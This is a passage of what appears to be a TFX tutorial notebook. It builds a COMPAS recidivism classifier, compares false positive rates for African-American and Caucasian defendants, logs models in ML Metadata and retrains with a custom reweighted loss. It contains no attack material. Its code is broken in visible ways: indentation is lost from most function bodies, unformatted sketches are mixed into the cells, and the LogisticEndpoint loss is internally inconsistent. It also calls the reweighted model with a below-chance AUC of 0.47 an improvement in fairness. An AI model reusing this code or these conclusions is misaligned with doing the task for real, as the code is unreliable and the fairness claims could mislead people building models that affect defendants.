LABEL_KEY = 'is_recid'
# List of the unique values for the items within CATEGORICAL_FEATURE_KEYS.
MAX_CATEGORICAL_FEATURE_VALUES = [
    2,
    6,
    513,
    14,
]
def transformed_name(key):
    return '{}_xf'.format(key)
def preprocessing_fn(inputs):
    """tf.transform's callback function for preprocessing inputs.
    Args:
      inputs: Map from feature keys to raw features.
    Returns:
      Map from string feature key to transformed feature operations.
    """
    outputs = {}
    for key in CATEGORICAL_FEATURE_KEYS:
        outputs[transformed_name(key)] = tft.compute_and_apply_vocabulary(
            _fill_in_missing(inputs[key]),
            vocab_filename=key)
    for key in INT_FEATURE_KEYS:
        outputs[transformed_name(key)] = tft.scale_to_z_score(
            _fill_in_missing(inputs[key]))
    # Target label will be to see if the defendant is charged for another crime.
    outputs[transformed_name(LABEL_KEY)] = _fill_in_missing(inputs[LABEL_KEY])
    return outputs
def _fill_in_missing(tensor_value):
    """Replaces missing values in a SparseTensor.
    Fills in missing values of `tensor_value` with '' or 0, and converts to a
    dense tensor.
    Args:
      tensor_value: A `SparseTensor` of rank 2. Its dense shape should have size
        at most 1 in the second dimension.
    Returns:
      A rank 1 tensor where missing values of `tensor_value` are filled in.
    """
    if not isinstance(tensor_value, tf.sparse.SparseTensor):
        return tensor_value
    default_value = '' if tensor_value.dtype == tf.string else 0
    sparse_tensor = tf.SparseTensor(
        tensor_value.indices,
        tensor_value.values,
        [tensor_value.dense_shape[0], 1])
    dense_tensor = tf.sparse.to_dense(sparse_tensor, default_value)
    return tf.squeeze(dense_tensor, axis=1)
# + id="5yzFOQrPlMkM"
# Build and run the Transform Component.
transform = Transform(
    examples=example_gen.outputs['examples'],
    schema=infer_schema.outputs['schema'],
    module_file=_transform_module_file
)
context.run(transform)
# + [markdown] id="A_ubj158lMkP"
# ### TFX Trainer Component
# The `Trainer` component trains a specified TensorFlow model.
#
# In order to run the Trainer component we need to create a Python module containing a `trainer_fn` function that will return an estimator for our model. If you prefer creating a Keras model, you can do so and then convert it to an estimator using `keras.model_to_estimator()`.
#
# For our case study we will build a Keras model and convert it with [`keras.model_to_estimator()`](https://www.tensorflow.org/api_docs/python/tf/keras/estimator/model_to_estimator).
# + id="K9zxx6CnlMkQ"
# Setup paths for the Trainer Component.
_trainer_module_file = 'compas_trainer.py'
# + id="KhuwfYIRlMkR"
# %%writefile {_trainer_module_file}
import tensorflow as tf
import tensorflow_model_analysis as tfma
import tensorflow_transform as tft
from tensorflow_transform.tf_metadata import schema_utils
from compas_transform import *
_BATCH_SIZE = 1000
_LEARNING_RATE = 0.00001
_MAX_CHECKPOINTS = 1
_SAVE_CHECKPOINT_STEPS = 999
def transformed_names(keys):
    return [transformed_name(key) for key in keys]
def transformed_name(key):
    return '{}_xf'.format(key)
def _gzip_reader_fn(filenames):
    """Returns a record reader that can read gzip'ed files.
    Args:
      filenames: A tf.string tensor or tf.data.Dataset containing one or more
        filenames.
    Returns: A nested structure of tf.TypeSpec objects matching the structure of
      an element of this dataset and specifying the type of individual components.
    """
    return tf.data.TFRecordDataset(filenames, compression_type='GZIP')
# Tf.Transform considers these features as "raw".
def _get_raw_feature_spec(schema):
"""Generates a feature spec from a Schema proto.
Args:
schema: A Schema proto.
Returns:
A feature spec defined as a dict whose keys are feature names and values are
instances of FixedLenFeature, VarLenFeature or SparseFeature.
"""
return schema_utils.schema_as_feature_spec(schema).feature_spec
def _example_serving_receiver_fn(tf_transform_output, schema):
"""Builds the serving in inputs.
Args:
tf_transform_output: A TFTransformOutput.
schema: the schema of the input data.
Returns:
TensorFlow graph which parses examples, applying tf-transform to them.
"""
raw_feature_spec = _get_raw_feature_spec(schema)
raw_feature_spec.pop(LABEL_KEY)
raw_input_fn = tf.estimator.export.build_parsing_serving_input_receiver_fn(
raw_feature_spec)
serving_input_receiver = raw_input_fn()
transformed_features = tf_transform_output.transform_raw_features(
serving_input_receiver.features)
transformed_features.pop(transformed_name(LABEL_KEY))
return tf.estimator.export.ServingInputReceiver(
transformed_features, serving_input_receiver.receiver_tensors)
def _eval_input_receiver_fn(tf_transform_output, schema):
"""Builds everything needed for the tf-model-analysis to run the model.
Args:
tf_transform_output: A TFTransformOutput.
schema: the schema of the input data.
Returns:
EvalInputReceiver function, which contains:
- TensorFlow graph which parses raw untransformed features, applies the
tf-transform preprocessing operators.
- Set of raw, untransformed features.
- Label against which predictions will be compared.
"""
# Notice that the inputs are raw features, not transformed features here.
raw_feature_spec = _get_raw_feature_spec(schema)
serialized_tf_example = tf.compat.v1.placeholder(
dtype=tf.string, shape=[None], name='input_example_tensor')
# Add a parse_example operator to the tensorflow graph, which will parse
# raw, untransformed, tf examples.
features = tf.io.parse_example(
serialized=serialized_tf_example, features=raw_feature_spec)
transformed_features = tf_transform_output.transform_raw_features(features)
labels = transformed_features.pop(transformed_name(LABEL_KEY))
receiver_tensors = {'examples': serialized_tf_example}
return tfma.export.EvalInputReceiver(
features=transformed_features,
receiver_tensors=receiver_tensors,
labels=labels)
def _input_fn(filenames, tf_transform_output, batch_size=200):
"""Generates features and labels for training or evaluation.
Args:
filenames: List of TFRecord files to read data from.
tf_transform_output: A TFTransformOutput.
batch_size: First dimension size of the Tensors returned by input_fn.
Returns:
A (features, indices) tuple where features is a dictionary of
Tensors, and indices is a single Tensor of label indices.
"""
transformed_feature_spec = (
tf_transform_output.transformed_feature_spec().copy())
dataset = tf.compat.v1.data.experimental.make_batched_features_dataset(
filenames,
batch_size,
transformed_feature_spec,
shuffle=False,
reader=_gzip_reader_fn)
transformed_features = dataset.make_one_shot_iterator().get_next()
# We pop the label because we do not want to use it as a feature while we're
# training.
return transformed_features, transformed_features.pop(
transformed_name(LABEL_KEY))
def _keras_model_builder():
"""Build a keras model for COMPAS dataset classification.
Returns:
A compiled Keras model.
"""
feature_columns = []
feature_layer_inputs = {}
for key in transformed_names(INT_FEATURE_KEYS):
feature_columns.append(tf.feature_column.numeric_column(key))
feature_layer_inputs[key] = tf.keras.Input(shape=(1,), name=key)
for key, num_buckets in zip(transformed_names(CATEGORICAL_FEATURE_KEYS),
MAX_CATEGORICAL_FEATURE_VALUES):
feature_columns.append(
tf.feature_column.indicator_column(
tf.feature_column.categorical_column_with_identity(
key, num_buckets=num_buckets)))
feature_layer_inputs[key] = tf.keras.Input(
shape=(1,), name=key, dtype=tf.dtypes.int32)
feature_columns_input = tf.keras.layers.DenseFeatures(feature_columns)
feature_layer_outputs = feature_columns_input(feature_layer_inputs)
dense_layers = tf.keras.layers.Dense(
20, activation='relu', name='dense_1')(feature_layer_outputs)
dense_layers = tf.keras.layers.Dense(
10, activation='relu', name='dense_2')(dense_layers)
output = tf.keras.layers.Dense(
1, name='predictions')(dense_layers)
model = tf.keras.Model(
inputs=[v for v in feature_layer_inputs.values()], outputs=output)
model.compile(
loss=tf.keras.losses.MeanAbsoluteError(),
optimizer=tf.optimizers.Adam(learning_rate=_LEARNING_RATE))
return model
# TFX will call this function.
def trainer_fn(hparams, schema):
"""Build the estimator using the high level API.
Args:
hparams: Hyperparameters used to train the model as name/value pairs.
schema: Holds the schema of the training examples.
Returns:
A dict of the following:
- estimator: The estimator that will be used for training and eval.
- train_spec: Spec for training.
- eval_spec: Spec for eval.
- eval_input_receiver_fn: Input function for eval.
"""
tf_transform_output = tft.TFTransformOutput(hparams.transform_output)
train_input_fn = lambda: _input_fn(
hparams.train_files,
tf_transform_output,
batch_size=_BATCH_SIZE)
eval_input_fn = lambda: _input_fn(
hparams.eval_files,
tf_transform_output,
batch_size=_BATCH_SIZE)
train_spec = tf.estimator.TrainSpec(
train_input_fn,
max_steps=hparams.train_steps)
serving_receiver_fn = lambda: _example_serving_receiver_fn(
tf_transform_output, schema)
exporter = tf.estimator.FinalExporter('compas', serving_receiver_fn)
eval_spec = tf.estimator.EvalSpec(
eval_input_fn,
steps=hparams.eval_steps,
exporters=[exporter],
name='compas-eval')
run_config = tf.estimator.RunConfig(
save_checkpoints_steps=_SAVE_CHECKPOINT_STEPS,
keep_checkpoint_max=_MAX_CHECKPOINTS)
run_config = run_config.replace(model_dir=hparams.serving_model_dir)
estimator = tf.keras.estimator.model_to_estimator(
keras_model=_keras_model_builder(), config=run_config)
# Create an input receiver for TFMA processing.
receiver_fn = lambda: _eval_input_receiver_fn(tf_transform_output, schema)
return {
'estimator': estimator,
'train_spec': train_spec,
'eval_spec': eval_spec,
'eval_input_receiver_fn': receiver_fn
}
# + id="oiC1wABllMkU"
# Uses a user-provided Python function that implements a model using
# TensorFlow's Estimator API.
trainer = Trainer(
module_file=_trainer_module_file,
transformed_examples=transform.outputs['transformed_examples'],
schema=infer_schema.outputs['schema'],
transform_graph=transform.outputs['transform_graph'],
train_args=trainer_pb2.TrainArgs(num_steps=10000),
eval_args=trainer_pb2.EvalArgs(num_steps=5000)
)
context.run(trainer)
# + [markdown] id="0tfnGpl2lMkv"
# ## TensorFlow Model Analysis
#
# Now that our model is developed and trained within TFX, we can use several additional components within the TFX ecosystem to understand our model's performance in more detail. By looking at different metrics we're able to get a better picture of how the model performs for different slices of our data, and make sure it is not underperforming for any subgroup.
#
# First we'll examine TensorFlow Model Analysis, which is a library for evaluating TensorFlow models. It allows users to evaluate their models on large amounts of data in a distributed manner, using the same metrics defined in their trainer. These metrics can be computed over different slices of data and visualized in a notebook.
#
# For a list of possible metrics that can be added into TensorFlow Model Analysis see [here](https://github.com/tensorflow/model-analysis/blob/master/g3doc/metrics.md).
#
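Conceptually, the sliced metrics that TFMA computes are a grouped aggregation over labeled predictions. A minimal pandas sketch of the idea (toy data; the column names here are illustrative, not the actual COMPAS fields):

```python
import pandas as pd

# Toy predictions; 'race' plays the role of the slice key from slicing_specs.
df = pd.DataFrame({
    'race':  ['A', 'A', 'B', 'B'],
    'label': [1, 0, 1, 0],
    'pred':  [1, 0, 0, 0],
})

# Per-slice binary accuracy -- the same idea TFMA applies at scale,
# in a distributed manner, for many metrics at once.
per_slice = (df.assign(correct=df['label'] == df['pred'])
               .groupby('race')['correct'].mean())
print(per_slice.to_dict())
```

TFMA does this over the full evaluation set with Beam, but the per-slice grouping is the core concept.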
# + id="i8VdZ4z3lMk0"
# Uses TensorFlow Model Analysis to compute evaluation statistics over
# features of a model.
model_analyzer = Evaluator(
examples=example_gen.outputs['examples'],
model=trainer.outputs['model'],
eval_config = text_format.Parse("""
model_specs {
label_key: 'is_recid'
}
metrics_specs {
metrics {class_name: "BinaryAccuracy"}
metrics {class_name: "AUC"}
metrics {
class_name: "FairnessIndicators"
config: '{"thresholds": [0.25, 0.5, 0.75]}'
}
}
slicing_specs {
feature_keys: 'race'
}
""", tfma.EvalConfig())
)
context.run(model_analyzer)
# + [markdown] id="gXGxPEAnBkUM"
# ## Fairness Indicators
#
# Load Fairness Indicators to examine the underlying data.
# + id="4ZgUtH_OBg2x"
evaluation_uri = model_analyzer.outputs['evaluation'].get()[0].uri
eval_result = tfma.load_eval_result(evaluation_uri)
tfma.addons.fairness.view.widget_view.render_fairness_indicator(eval_result)
# + [markdown] id="igoChEEblMk4"
# Fairness Indicators allows us to drill down into the performance of different slices and is designed to support teams in evaluating and improving models for fairness concerns. It enables easy computation of fairness metrics for binary and multiclass classifiers and scales to use cases of any size.
#
# We will load Fairness Indicators into this notebook and analyze the results. After you have spent a moment exploring Fairness Indicators, examine the False Positive Rate and False Negative Rate tabs in the tool. In this case study, we're concerned with reducing the number of false predictions of recidivism, corresponding to the [False Positive Rate](https://en.wikipedia.org/wiki/Receiver_operating_characteristic).
#
# 
#
# Within the Fairness Indicators tool you'll see two dropdown options:
# 1. A "Baseline" option that is set by `column_for_slicing`.
# 2. A "Thresholds" option that is set by `fairness_indicator_thresholds`.
#
# “Baseline” is the slice you want to compare all other slices to. Most commonly, it is the overall slice, but it can also be one of the specific slices.
#
# "Threshold" is a value set within a given binary classification model to indicate where a prediction should be placed. When setting a threshold there are two things you should keep in mind.
#
# 1. Precision: What is the downside of a Type I error? In this case study, a lower threshold means predicting that more defendants *will* commit another crime when they actually *won't*.
# 2. Recall: What is the downside of a Type II error? In this case study, a higher threshold means predicting that more defendants *will not* commit another crime when they actually *do*.
#
# We will set an arbitrary threshold of 0.75 and focus only on the fairness metrics for African-American and Caucasian defendants, since the sample sizes for the other races aren't large enough to draw statistically significant conclusions.
#
# The exact rates below might differ slightly based on how the data was shuffled at the beginning of this case study, but take a look at the difference between African-American and Caucasian defendants. At a lower threshold our model is more likely to predict that a Caucasian defendant will commit a second crime than an African-American defendant; this prediction inverts as we increase the threshold.
#
# * **False Positive Rate @ 0.75**
# * **African-American:** ~30%
# * AUC: 0.71
# * Binary Accuracy: 0.67
# * **Caucasian:** ~8%
# * AUC: 0.71
# * Binary Accuracy: 0.67
#
# More information on Type I/II errors and threshold setting can be found [here](https://developers.google.com/machine-learning/crash-course/classification/thresholding).
#
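The trade-off between these two error types can be made concrete with a few lines of plain Python. This is a self-contained sketch with made-up scores, not output from the model above:

```python
def rates_at_threshold(scores, labels, threshold):
    """False positive rate and false negative rate at a decision threshold."""
    preds = [1 if s >= threshold else 0 for s in scores]
    fp = sum(1 for p, y in zip(preds, labels) if p == 1 and y == 0)
    fn = sum(1 for p, y in zip(preds, labels) if p == 0 and y == 1)
    return fp / labels.count(0), fn / labels.count(1)

# Made-up scores for two positive and two negative examples.
scores = [0.9, 0.6, 0.4, 0.1]
labels = [1, 0, 1, 0]
for t in (0.3, 0.5, 0.75):
    print(t, rates_at_threshold(scores, labels, t))
```

Raising the threshold lowers the false positive rate at the cost of the false negative rate, which is exactly the tension between the two points above.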
# + [markdown] id="Mpbs4x9dB2PA"
# ## ML Metadata
#
# To understand where disparity could be coming from and to take a snapshot of our current model, we can use ML Metadata for recording and retrieving metadata associated with our model. ML Metadata is an integral part of TFX, but is designed so that it can be used independently.
#
# For this case study, we will list all the artifacts that we developed previously. By cycling through the artifacts, executions, and contexts we get a high-level view of our TFX pipeline and can dig into where any potential issues are coming from. This will provide us with a baseline overview of how our model was developed and which TFX components helped to develop our initial model.
#
# We will start by first laying out the high level artifacts, execution, and context types in our model.
#
# + id="0wjiFKOxlMkn"
# Connect to the TFX database.
connection_config = metadata_store_pb2.ConnectionConfig()
connection_config.sqlite.filename_uri = os.path.join(
context.pipeline_root, 'metadata.sqlite')
store = metadata_store.MetadataStore(connection_config)
def _mlmd_type_to_dataframe(mlmd_type):
"""Helper function to turn MLMD into a Pandas DataFrame.
Args:
mlmd_type: Metadata store type.
Returns:
DataFrame containing type ID, Name, and Properties.
"""
pd.set_option('display.max_columns', None)
pd.set_option('display.expand_frame_repr', False)
column_names = ['ID', 'Name', 'Properties']
rows = [[a_type.id, a_type.name, a_type.properties] for a_type in mlmd_type]
return pd.DataFrame(rows, columns=column_names)
# ML Metadata stores strong-typed Artifacts, Executions, and Contexts.
# First, we can use type APIs to understand what is defined in ML Metadata
# by the current version of TFX. We'll be able to view all the previous runs
# that created our initial model.
print('Artifact Types:')
display(_mlmd_type_to_dataframe(store.get_artifact_types()))
print('\nExecution Types:')
display(_mlmd_type_to_dataframe(store.get_execution_types()))
print('\nContext Types:')
display(_mlmd_type_to_dataframe(store.get_context_types()))
# + [markdown] id="lJQoer33ZEXD"
# ## Identify where the fairness issue could be coming from
#
# For each of the above artifacts, execution, and context types we can use ML Metadata to dig into the attributes and how each part of our ML pipeline was developed.
#
# We'll start by diving into the `StatisticsGen` to examine the underlying data that we initially fed into the model. By knowing the artifacts within our model we can use ML Metadata and TensorFlow Data Validation to look backward and forward within the model to identify where a potential problem is coming from.
#
# After running the below cell, select `Lift (Y=1)` in the second chart on the `Chart to show` tab to see the [lift](https://en.wikipedia.org/wiki/Lift_(data_mining)) between the different data slices. Within `race`, the lift for African-American is approximately 1.08 whereas for Caucasian it is approximately 0.86.
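As a self-contained illustration of that lift number: lift compares the label rate inside a slice to the overall label rate, with values above 1 meaning the slice is positively associated with the label (toy data here, not the COMPAS values):

```python
def lift(labels, in_slice):
    """Lift of Y=1 for a slice: P(Y=1 | slice) / P(Y=1)."""
    slice_labels = [y for y, m in zip(labels, in_slice) if m]
    return (sum(slice_labels) / len(slice_labels)) / (sum(labels) / len(labels))

labels   = [1, 1, 0, 1, 0, 0]   # overall P(Y=1) = 1/2
in_slice = [1, 1, 0, 0, 0, 1]   # within the slice, P(Y=1) = 2/3
print(lift(labels, in_slice))   # (2/3) / (1/2)
```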
# + id="xvcw9KL0byeY"
statistics_gen = StatisticsGen(
examples=example_gen.outputs['examples'],
schema=infer_schema.outputs['schema'],
stats_options=tfdv.StatsOptions(label_feature='is_recid'))
exec_result = context.run(statistics_gen)
for event in store.get_events_by_execution_ids([exec_result.execution_id]):
if event.path.steps[0].key == 'statistics':
statistics_w_schema_uri = store.get_artifacts_by_id([event.artifact_id])[0].uri
model_stats = tfdv.load_statistics(
os.path.join(statistics_w_schema_uri, 'eval/stats_tfrecord/'))
tfdv.visualize_statistics(model_stats)
# + [markdown] id="ofWXz48zzlGT"
# ## Tracking a Model Change
#
# Now that we have an idea of how we could improve the fairness of our model, we will first document our initial run within ML Metadata, for our own records and for anyone else who might review our changes in the future.
#
# ML Metadata can keep a log of our past models along with any notes that we would like to add between runs. We'll add a simple note on our first run denoting that it was done on the full COMPAS dataset.
# + id="GCQ-7kzMRbXM"
_MODEL_NOTE_TO_ADD = 'First model that contains fairness concerns in the model.'
first_trained_model = store.get_artifacts_by_type('Model')[-1]
# Add the note above to the ML Metadata.
first_trained_model.custom_properties['note'].string_value = _MODEL_NOTE_TO_ADD
store.put_artifacts([first_trained_model])
def _mlmd_model_to_dataframe(model, model_number):
"""Helper function to turn a MLMD modle into a Pandas DataFrame.
Args:
model: Metadata store model.
model_number: Number of model run within ML Metadata.
Returns:
DataFrame containing the ML Metadata model.
"""
pd.set_option('display.max_columns', None)
pd.set_option('display.expand_frame_repr', False)
df = pd.DataFrame()
custom_properties = ['name', 'note', 'state', 'producer_component',
'pipeline_name']
df['id'] = [model[model_number].id]
df['uri'] = [model[model_number].uri]
for prop in custom_properties:
df[prop] = model[model_number].custom_properties.get(prop)
df[prop] = df[prop].astype(str).map(
lambda x: x.lstrip('string_value: "').rstrip('"\n'))
return df
# Print the current model to see the results of the ML Metadata for the model.
display(_mlmd_model_to_dataframe(store.get_artifacts_by_type('Model'), 0))
# + [markdown] id="-gwiNtcoeO8S"
# ## Improving fairness concerns by weighting the model
#
#
# There are several ways to address fairness concerns within a model. Manipulating the observed data/labels, implementing fairness constraints, or prejudice removal through regularization are some of the techniques<sup>1</sup> that have been used. In this case study we will reweight the model by implementing a custom loss function in Keras.
#
# The code below is the same as the Trainer module above, with the exception of a new class called `LogisticEndpoint` that we will use as the loss within Keras, plus a few parameter changes.
#
# ___
#
# 1. <NAME>., <NAME>., <NAME>., <NAME>., <NAME>. (2019). A Survey on Bias and Fairness in Machine Learning. https://arxiv.org/pdf/1908.09635.pdf
#
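Independent of TFX, the core idea of reweighting is to scale each example's contribution to the loss. One common scheme is inverse-frequency weighting per (group, label) cell, sketched here purely as an illustration; it is not the exact weighting the trainer module below applies:

```python
from collections import Counter

def inverse_frequency_weights(groups, labels):
    """Weight each example inversely to its (group, label) cell frequency,
    so that under-represented cells contribute equally to the total loss."""
    counts = Counter(zip(groups, labels))
    n, n_cells = len(labels), len(counts)
    return [n / (n_cells * counts[(g, y)]) for g, y in zip(groups, labels)]

groups = ['a', 'a', 'a', 'b']
labels = [1, 1, 0, 0]
weights = inverse_frequency_weights(groups, labels)
print(weights)   # the lone (a,0) and (b,0) examples get the largest weights
```

Such weights would then be passed to the loss via `sample_weight`, which is the role the `sample_weight_xf` feature plays in the custom loss class below.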
# + id="yzLWm3-1Zjvv"
# %%writefile {_trainer_module_file}
import numpy as np
import tensorflow as tf
import tensorflow_model_analysis as tfma
import tensorflow_transform as tft
from tensorflow_transform.tf_metadata import schema_utils
from compas_transform import *
_BATCH_SIZE = 1000
_LEARNING_RATE = 0.00001
_MAX_CHECKPOINTS = 1
_SAVE_CHECKPOINT_STEPS = 999
def transformed_names(keys):
return [transformed_name(key) for key in keys]
def transformed_name(key):
return '{}_xf'.format(key)
def _gzip_reader_fn(filenames):
"""Returns a record reader that can read gzip'ed files.
Args:
filenames: A tf.string tensor or tf.data.Dataset containing one or more
filenames.
Returns:
A TFRecordDataset that reads the gzip-compressed record files.
"""
return tf.data.TFRecordDataset(filenames, compression_type='GZIP')
# Tf.Transform considers these features as "raw".
def _get_raw_feature_spec(schema):
"""Generates a feature spec from a Schema proto.
Args:
schema: A Schema proto.
Returns:
A feature spec defined as a dict whose keys are feature names and values are
instances of FixedLenFeature, VarLenFeature or SparseFeature.
"""
return schema_utils.schema_as_feature_spec(schema).feature_spec
def _example_serving_receiver_fn(tf_transform_output, schema):
"""Builds the serving in inputs.
Args:
tf_transform_output: A TFTransformOutput.
schema: the schema of the input data.
Returns:
TensorFlow graph which parses examples, applying tf-transform to them.
"""
raw_feature_spec = _get_raw_feature_spec(schema)
raw_feature_spec.pop(LABEL_KEY)
raw_input_fn = tf.estimator.export.build_parsing_serving_input_receiver_fn(
raw_feature_spec)
serving_input_receiver = raw_input_fn()
transformed_features = tf_transform_output.transform_raw_features(
serving_input_receiver.features)
transformed_features.pop(transformed_name(LABEL_KEY))
return tf.estimator.export.ServingInputReceiver(
transformed_features, serving_input_receiver.receiver_tensors)
def _eval_input_receiver_fn(tf_transform_output, schema):
"""Builds everything needed for the tf-model-analysis to run the model.
Args:
tf_transform_output: A TFTransformOutput.
schema: the schema of the input data.
Returns:
EvalInputReceiver function, which contains:
- TensorFlow graph which parses raw untransformed features, applies the
tf-transform preprocessing operators.
- Set of raw, untransformed features.
- Label against which predictions will be compared.
"""
# Notice that the inputs are raw features, not transformed features here.
raw_feature_spec = _get_raw_feature_spec(schema)
serialized_tf_example = tf.compat.v1.placeholder(
dtype=tf.string, shape=[None], name='input_example_tensor')
# Add a parse_example operator to the tensorflow graph, which will parse
# raw, untransformed, tf examples.
features = tf.io.parse_example(
serialized=serialized_tf_example, features=raw_feature_spec)
transformed_features = tf_transform_output.transform_raw_features(features)
labels = transformed_features.pop(transformed_name(LABEL_KEY))
receiver_tensors = {'examples': serialized_tf_example}
return tfma.export.EvalInputReceiver(
features=transformed_features,
receiver_tensors=receiver_tensors,
labels=labels)
def _input_fn(filenames, tf_transform_output, batch_size=200):
"""Generates features and labels for training or evaluation.
Args:
filenames: List of TFRecord files to read data from.
tf_transform_output: A TFTransformOutput.
batch_size: First dimension size of the Tensors returned by input_fn.
Returns:
A (features, indices) tuple where features is a dictionary of
Tensors, and indices is a single Tensor of label indices.
"""
transformed_feature_spec = (
tf_transform_output.transformed_feature_spec().copy())
dataset = tf.compat.v1.data.experimental.make_batched_features_dataset(
filenames,
batch_size,
transformed_feature_spec,
shuffle=False,
reader=_gzip_reader_fn)
transformed_features = dataset.make_one_shot_iterator().get_next()
# We pop the label because we do not want to use it as a feature while we're
# training.
return transformed_features, transformed_features.pop(
transformed_name(LABEL_KEY))
# TFX will call this function.
def trainer_fn(hparams, schema):
"""Build the estimator using the high level API.
Args:
hparams: Hyperparameters used to train the model as name/value pairs.
schema: Holds the schema of the training examples.
Returns:
A dict of the following:
- estimator: The estimator that will be used for training and eval.
- train_spec: Spec for training.
- eval_spec: Spec for eval.
- eval_input_receiver_fn: Input function for eval.
"""
tf_transform_output = tft.TFTransformOutput(hparams.transform_output)
train_input_fn = lambda: _input_fn(
hparams.train_files,
tf_transform_output,
batch_size=_BATCH_SIZE)
eval_input_fn = lambda: _input_fn(
hparams.eval_files,
tf_transform_output,
batch_size=_BATCH_SIZE)
train_spec = tf.estimator.TrainSpec(
train_input_fn,
max_steps=hparams.train_steps)
serving_receiver_fn = lambda: _example_serving_receiver_fn(
tf_transform_output, schema)
exporter = tf.estimator.FinalExporter('compas', serving_receiver_fn)
eval_spec = tf.estimator.EvalSpec(
eval_input_fn,
steps=hparams.eval_steps,
exporters=[exporter],
name='compas-eval')
run_config = tf.estimator.RunConfig(
save_checkpoints_steps=_SAVE_CHECKPOINT_STEPS,
keep_checkpoint_max=_MAX_CHECKPOINTS)
run_config = run_config.replace(model_dir=hparams.serving_model_dir)
estimator = tf.keras.estimator.model_to_estimator(
keras_model=_keras_model_builder(), config=run_config)
# Create an input receiver for TFMA processing.
receiver_fn = lambda: _eval_input_receiver_fn(tf_transform_output, schema)
return {
'estimator': estimator,
'train_spec': train_spec,
'eval_spec': eval_spec,
'eval_input_receiver_fn': receiver_fn
}
def _keras_model_builder():
"""Build a keras model for COMPAS dataset classification.
Returns:
A compiled Keras model.
"""
feature_columns = []
feature_layer_inputs = {}
for key in transformed_names(INT_FEATURE_KEYS):
feature_columns.append(tf.feature_column.numeric_column(key))
feature_layer_inputs[key] = tf.keras.Input(shape=(1,), name=key)
for key, num_buckets in zip(transformed_names(CATEGORICAL_FEATURE_KEYS),
MAX_CATEGORICAL_FEATURE_VALUES):
feature_columns.append(
tf.feature_column.indicator_column(
tf.feature_column.categorical_column_with_identity(
key, num_buckets=num_buckets)))
feature_layer_inputs[key] = tf.keras.Input(
shape=(1,), name=key, dtype=tf.dtypes.int32)
feature_columns_input = tf.keras.layers.DenseFeatures(feature_columns)
feature_layer_outputs = feature_columns_input(feature_layer_inputs)
dense_layers = tf.keras.layers.Dense(
20, activation='relu', name='dense_1')(feature_layer_outputs)
dense_layers = tf.keras.layers.Dense(
10, activation='relu', name='dense_2')(dense_layers)
output = tf.keras.layers.Dense(
1, name='predictions')(dense_layers)
model = tf.keras.Model(
inputs=[v for v in feature_layer_inputs.values()], outputs=output)
# To weight our model we will develop a custom loss class within Keras.
# The old loss is commented out below and the new one is added in below.
model.compile(
# loss=tf.keras.losses.BinaryCrossentropy(from_logits=True),
loss=LogisticEndpoint(),
optimizer=tf.optimizers.Adam(learning_rate=_LEARNING_RATE))
return model
class LogisticEndpoint(tf.keras.layers.Layer):
def __init__(self, name=None):
super(LogisticEndpoint, self).__init__(name=name)
self.loss_fn = tf.keras.losses.BinaryCrossentropy(from_logits=True)
def __call__(self, y_true, y_pred, sample_weight=None):
inputs = [y_true, y_pred]
inputs += sample_weight or ['sample_weight_xf']
return super(LogisticEndpoint, self).__call__(inputs)
def call(self, inputs):
y_true, y_pred = inputs[0], inputs[1]
if len(inputs) == 3:
sample_weight = inputs[2]
else:
sample_weight = None
loss = self.loss_fn(y_true, y_pred, sample_weight)
self.add_loss(loss)
reduce_loss = tf.math.divide_no_nan(
tf.math.reduce_sum(tf.nn.softmax(y_pred)), _BATCH_SIZE)
return reduce_loss
# + [markdown] id="thSmshFN94pt"
# ## Retrain the TFX model with the weighted model
#
# In this next part we will rerun the same Trainer component as before with the reweighted trainer module, to see the improvement in fairness after the weighting is applied.
# + id="Bb0Rl9UOFgoM"
trainer_weighted = Trainer(
module_file=_trainer_module_file,
transformed_examples=transform.outputs['transformed_examples'],
schema=infer_schema.outputs['schema'],
transform_graph=transform.outputs['transform_graph'],
train_args=trainer_pb2.TrainArgs(num_steps=10000),
eval_args=trainer_pb2.EvalArgs(num_steps=5000)
)
context.run(trainer_weighted)
# + id="n7xH61MCPwUO"
# Again, we will run TensorFlow Model Analysis and load Fairness Indicators
# to examine the performance change in our weighted model.
model_analyzer_weighted = Evaluator(
examples=example_gen.outputs['examples'],
model=trainer_weighted.outputs['model'],
eval_config = text_format.Parse("""
model_specs {
label_key: 'is_recid'
}
metrics_specs {
metrics {class_name: 'BinaryAccuracy'}
metrics {class_name: 'AUC'}
metrics {
class_name: 'FairnessIndicators'
config: '{"thresholds": [0.25, 0.5, 0.75]}'
}
}
slicing_specs {
feature_keys: 'race'
}
""", tfma.EvalConfig())
)
context.run(model_analyzer_weighted)
# + id="206gQS1r-1FX"
evaluation_uri_weighted = model_analyzer_weighted.outputs['evaluation'].get()[0].uri
eval_result_weighted = tfma.load_eval_result(evaluation_uri_weighted)
multi_eval_results = {
'Unweighted Model': eval_result,
'Weighted Model': eval_result_weighted
}
tfma.addons.fairness.view.widget_view.render_fairness_indicator(
multi_eval_results=multi_eval_results)
# + [markdown] id="bwoz69Wzvt8q"
# After retraining with the weighted model, we can once again look at the fairness metrics to gauge any improvements. This time, however, we will use the model comparison feature within Fairness Indicators to see the difference between the weighted and unweighted models. Although we're still seeing some fairness concerns with the weighted model, the discrepancy is far less pronounced.
#
# The drawback, however, is that our AUC and binary accuracy have also dropped after weighting the model.
#
#
# * **False Positive Rate @ 0.75**
# * **African-American:** ~1%
# * AUC: 0.47
# * Binary Accuracy: 0.59
# * **Caucasian:** ~0%
# * AUC: 0.47
# * Binary Accuracy: 0.58
#
# + [markdown] id="oEhq3ne7gazf"
# ## Examine the data of the second run
#
# Finally, we can visualize the data with TensorFlow Data Validation and overlay the data changes between the two models and add an additional note to the ML Metadata indicating that this model has improved the fairness concerns.
# + id="WM-uqqfOggcw"
# Pull the URI for the two models that we ran in this case study.
first_model_uri = store.get_artifacts_by_type('ExampleStatistics')[-1].uri
second_model_uri = store.get_artifacts_by_type('ExampleStatistics')[0].uri
# Load the stats for both models.
first_model_stats = tfdv.load_statistics(os.path.join(
first_model_uri, 'eval/stats_tfrecord/'))
second_model_stats = tfdv.load_statistics(os.path.join(
second_model_uri, 'eval/stats_tfrecord/'))
# Visualize the statistics between the two models.
tfdv.visualize_statistics(
lhs_statistics=second_model_stats,
lhs_name='Sampled Model',
rhs_statistics=first_model_stats,
rhs_name='COMPAS Original')
# + id="YOMbqITkhNkO"
# Add a new note within ML Metadata describing the weighted model.
_NOTE_TO_ADD = 'Weighted model between race and is_recid.'
# Pulling the URI for the weighted trained model.
second_trained_model = store.get_artifacts_by_type('Model')[-1]
# Add the note to ML Metadata.
second_trained_model.custom_properties['note'].string_value = _NOTE_TO_ADD
store.put_artifacts([second_trained_model])
